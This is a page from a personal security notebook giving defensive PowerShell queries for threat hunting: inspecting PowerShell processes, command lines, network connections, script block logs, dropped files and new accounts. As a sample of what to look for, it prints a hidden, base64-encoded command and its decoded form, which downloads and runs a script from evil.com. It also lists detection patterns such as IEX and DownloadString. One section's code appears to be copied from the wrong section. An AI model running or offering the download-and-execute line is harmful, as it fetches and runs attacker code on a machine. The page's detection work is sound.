📒
Book of VanLuong
  • 👨‍💻About the Author
  • Cryptography
    • Cryptanalysis
      • RSA & RSA ATTACK
      • DES (Data Encryption Standard)
      • AES (Advanced Encryption Standard)
      • ECC ( Elliptic Curve of Cryptography)
      • Group-based Cryptography
      • Lattice-based Cryptography
      • ChaCha20-Poly1305
      • Hash Function
      • Wargame CTF
  • C2
    • Practical with Havoc Framework
  • Blue Teaming
    • SIEM & SOC
      • SIEM
      • SOC
      • Splunk
    • Cybersecurity Lab & Threat Intelligence
      • Build ELK Lab
        • Configure Elasticsearch and Kibana setup in ubuntu
        • Fluent Bit – Sending Logs to ELK with Fluent Bit
        • Winlogbeat – Collecting and Forwarding Windows Event Logs.
        • Filebeat – Collecting and Forwarding Windows Event Logs.
        • Send Logs from Winlogbeat through Logstash to ELK
        • Audit policy & Winlogbeat
      • Sysmon configuration
    • PowerShell in Incident Response and Threat Hunting
      • PowerShell For Incident Response
      • PowerShell For Threat Hunting
  • Techniques used in malware
    • DLL side loading
    • DLL Unhooking
    • Call stack spoofing
  • Wazuh App Dashboards for Splunk
  • Windows
    • 70 Vital Windows Commands
    • Windows Registry Forensics
  • Guide to Installing Kali Linux, DVWA, and bWAPP
    • Phần 1. CÀI ĐẶT HỆ ĐIỀU HÀNH KALI LINUX
    • Phần 2. CÀI ĐẶT DVWA
    • Phần 3. CÀI ĐẶT BWAPP
  • CTF
    • CTF-writeup-in-KCSC
Powered by GitBook
On this page
  • Process Tree
  • PowerShell Process Command Lines
  • PowerShell Binary Hashes
  • PowerShell Process Start Times
  • PowerShell Network Connections
  • PowerShell Parent Processes
  • PowerShell Loaded Modules
  • PowerShell Script Block Logs
  • PowerShell Process ACLs
  • Check for Scheduled Tasks Created by PowerShell
  • Check for Files Added to Temp Folder by PowerShell
  • Check for Files Added to AppData Folder by PowerShell
  • Hunt for Other Files Created by PowerShell
  • Hunt for PowerShell Activity in Event Logs
  • Hunt for PowerShell Interaction with WMI
  • Hunt for Newly Created User Accounts
  • Hunt for int process of Network Connection

Was this helpful?

  1. Blue Teaming
  2. PowerShell in Incident Response and Threat Hunting

PowerShell For Threat Hunting

Process Tree

Purpose: hunt for malicious/suspicious process like powershell

Get-CimInstance Win32_Process | 
  Where-Object {$_.Name -match 'powershell|pwsh'} | 
  Select-Object ProcessId,ParentProcessId,CommandLine | 
  Sort-Object ParentProcessId

Hunt For:

  • explorer.exe → cmd.exe → powershell.exe chains

  • Parent processes like winword.exe spawning PowerShell

PowerShell Process Command Lines

Purpose: Uncover hidden execution parameters

Get-CimInstance Win32_Process | 
  Where-Object { $_.Name -match 'powershell|pwsh' -and $_.CommandLine -ne $null } | 
  Select-Object ProcessId,CommandLine | 
  Format-Table -Wrap

Hunt For:

  • -EncodedCommand with base64

  • IEX (New-Object Net.WebClient).DownloadString() patterns

  • Uncommon arguments like -nop -w hidden -ep bypass

Example:

powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "SQBleABlACAobkV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly9ldmlsLmNvbS9zaGVsbC5wcycp"
||
||
Iex (New-Object System.Net.WebClient).DownloadString('http://evil.com/shell.ps1')

PowerShell Binary Hashes

Purpose: Verify authentic PowerShell executables

Get-Process -Name powershell*, pwsh* | 
  Where-Object { $_.Path } | 
  ForEach-Object {
    [PSCustomObject]@{
      Name = $_.Name
      Path = $_.Path
      SHA256 = (Get-FileHash -Path $_.Path -Algorithm SHA256).Hash
    }
  } | Format-Table -AutoSize

Hunt For:

  • Hashes not matching Microsoft-signed binaries

  • PowerShell running from Temp or AppData

PowerShell Process Start Times

Purpose: Identify new/unexpected instances

Get-Process -Name powershell*, pwsh* | 
  Where-Object { $_.StartTime } | 
  Sort-Object StartTime | 
  Select-Object Name,Id,StartTime -Last 5

Hunt For:

  • Processes started at odd hours (e.g., 2 AM)

  • Multiple instances spawned within seconds

PowerShell Network Connections

Purpose: Detect C2 communications

Get-NetTCPConnection -State Established | 
  Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -match 'powershell|pwsh' } | 
  Select-Object LocalAddress,RemoteAddress,RemotePort,@{N='Process';E={(Get-Process -Id $_.OwningProcess).Name}}

Hunt For:

  • Connections to cloud IPs (AWS/Azure DigitalOcean)

  • Ports 443, 8443, 4443 with no SSL handshake

  • Office apps (winword.exe) spawning PowerShell

  • explorer.exe → cmd.exe → powershell.exe chains

PowerShell Parent Processes

Purpose: Uncover injection chains

Get-CimInstance Win32_Process | 
  Where-Object { $_.Name -match 'powershell|pwsh' } | 
  Select-Object ProcessId,ParentProcessId,CommandLine | 
  ForEach-Object {
    $parent = Get-Process -Id $_.ParentProcessId -ErrorAction SilentlyContinue
    [PSCustomObject]@{
      PowerShell_PID = $_.ProcessId
      Parent_Name = $parent.Name
      Parent_PID = $_.ParentProcessId
      CommandLine = $_.CommandLine
    }
  } | Format-Table -Wrap

Hunt For:

  • Office apps (winword.exe) spawning PowerShell

  • explorer.exe → cmd.exe → powershell.exe chains

PowerShell Loaded Modules

Purpose: Detect in-memory injection

Get-Process -Name powershell*, pwsh* | 
  Select-Object Name,Id,@{N='Modules';E={$_.Modules.ModuleName -join ';'}} | 
  Where-Object { $_.Modules -like "*tmp*" -or $_.Modules -like "*appdata*" }

Hunt For:

  • DLLs loaded from Temp folders

  • Missing Microsoft-signed core modules

PowerShell Script Block Logs

Purpose: Extract executed code blocks

Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -MaxEvents 20 | 
  Where-Object { $_.Id -eq 4104 } | 
  Select-Object TimeCreated,@{N='Command';E={$_.Properties[0].Value}} | 
  Format-Table -Wrap

Hunt For:

  • Invoke-Expression with external URLs

  • AMSI bypass patterns ([Ref].Assembly.GetType())

PowerShell Process ACLs

Purpose: Check for suspicious ownership

Get-Process -Name powershell*, pwsh* | 
  ForEach-Object {
    $owner = (Get-Acl -Path "\\?\handle::$($_.Id)").Owner
    [PSCustomObject]@{
      ProcessId = $_.Id
      Owner = $owner
      BinaryPath = $_.Path
    }
  }

Hunt For:

  • Processes owned by NT AUTHORITY\SYSTEM with network calls

  • Unknown user accounts running PowerShell

Check for Scheduled Tasks Created by PowerShell

Purpose: Detect if powershell.exe is used to create scheduled tasks, a common persistence technique.

Get-ChildItem -Path $env:TEMP -Recurse -File | Where-Object { $_.CreationTime -gt (Get-Date).AddHours(-24) -and ($_.Name -like "*.ps1" -or $_.Name -like "*.exe" -or $_.Name -like "*.dll") } | Select-Object Name, FullName, CreationTime

Check for Files Added to Temp Folder by PowerShell

Purpose: Identify suspicious files (e.g., .ps1, .exe, .dll) created in the Temp folder, potentially by PowerShell.

Get-ChildItem -Path $env:TEMP -Recurse -File | Where-Object { $_.CreationTime -gt (Get-Date).AddHours(-24) -and ($_.Name -like "*.ps1" -or $_.Name -like "*.exe" -or $_.Name -like "*.dll") } | Select-Object Name, FullName, CreationTime

Check for Files Added to AppData Folder by PowerShell

Purpose: Detect suspicious files in the AppData folder, a common drop location for PowerShell-dropped malware.

Get-ChildItem -Path $env:APPDATA -Recurse -File | Where-Object { $_.CreationTime -gt (Get-Date).AddHours(-24) -and ($_.Name -like "*.ps1" -or $_.Name -like "*.exe" -or $_.Name -like "*.dll") } | Select-Object Name, FullName, CreationTime

Hunt for Other Files Created by PowerShell

Purpose: Identify new files created system-wide (outside Temp/AppData) that might be PowerShell-related.

Get-ChildItem -Path "C:\" -Recurse -File -ErrorAction SilentlyContinue | Where-Object { $_.CreationTime -gt (Get-Date).AddHours(-24) -and $_.DirectoryName -notlike "*$env:TEMP*" -and $_.DirectoryName -notlike "*$env:APPDATA*" -and ($_.Name -like "*.ps1" -or $_.Name -like "*.exe" -or $_.Name -like "*.dll") } | Select-Object Name, FullName, CreationTime, DirectoryName

Hunt for PowerShell Activity in Event Logs

Purpose: Detect suspicious PowerShell commands (e.g., Invoke-Expression, DownloadString) that might indicate file creation or task scheduling.

Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Id -eq 4104 } | Select-String -Pattern "Invoke-Expression|DownloadString|IEX" | Select-Object TimeCreated, Message

Hunt for PowerShell Interaction with WMI

Purpose: check if powershell.exe is running, interacting with WMI, or calling WMI classes

# 1. Check PowerShell module logs (ID 4103) for WMI
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Id -eq 4103 } | Select-String -Pattern "WMI|Win32_|Get-WmiObject|Get-CimInstance" | Select-Object TimeCreated, Message

# 2. Check PowerShell script block logs (ID 4104) for WMI
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Id -eq 4104 } | Select-String -Pattern "WMI|Win32_|Get-WmiObject|Get-CimInstance" | Select-Object TimeCreated, Message

# 3. Check WMI activity logs for PowerShell involvement
Get-WinEvent -LogName "Microsoft-Windows-WMI-Activity/Operational" | Where-Object { $_.Message -like "*powershell*" } | Select-Object TimeCreated, Message

# 4. Check PowerShell command history for WMI calls
Get-History | Where-Object { $_.CommandLine -like "*WMI*|*Win32_*|*Get-WmiObject*|*Get-CimInstance*" } | Select-Object CommandLine, StartExecutionTime

Hunt for Newly Created User Accounts

Purpose: Identify recently created user accounts in Active Directory to detect potential malicious activity (e.g., unauthorized account creation for persistence or lateral movement) for threat hunting.

Get-ADUser -Filter * -Properties WhenCreated, CreatedBy, LastLogonDate | 
Where-Object { $_.WhenCreated -ge (Get-Date).AddDays(-7) } | 
Select-Object Name, SamAccountName, WhenCreated, CreatedBy, LastLogonDate, DistinguishedName | 
Sort-Object WhenCreated -Descending | 
Format-Table -AutoSize

Hunt for int process of Network Connection

Purpose: Identify processes with anomalous network connections (e.g., spoofed IPs, unexpected outbound traffic, or impersonated system services) to detect potential malware or lateral movement.

Get-NetTCPConnection -State Established | Where-Object {
    $_.RemoteAddress -notmatch '^(127\.|0\.0\.0|::1)' -and
    (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -match 'svchost|powershell|wscript'
} | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State,
    @{Name="Process"; Expression={(Get-Process -Id $_.OwningProcess).Name}},
    @{Name="PID"; Expression={$_.OwningProcess}},
    @{Name="ProcessPath"; Expression={(Get-Process -Id $_.OwningProcess).Path}} |
Format-Table -AutoSize
PreviousPowerShell For Incident ResponseNextTechniques used in malware

Last updated 1 month ago

Was this helpful?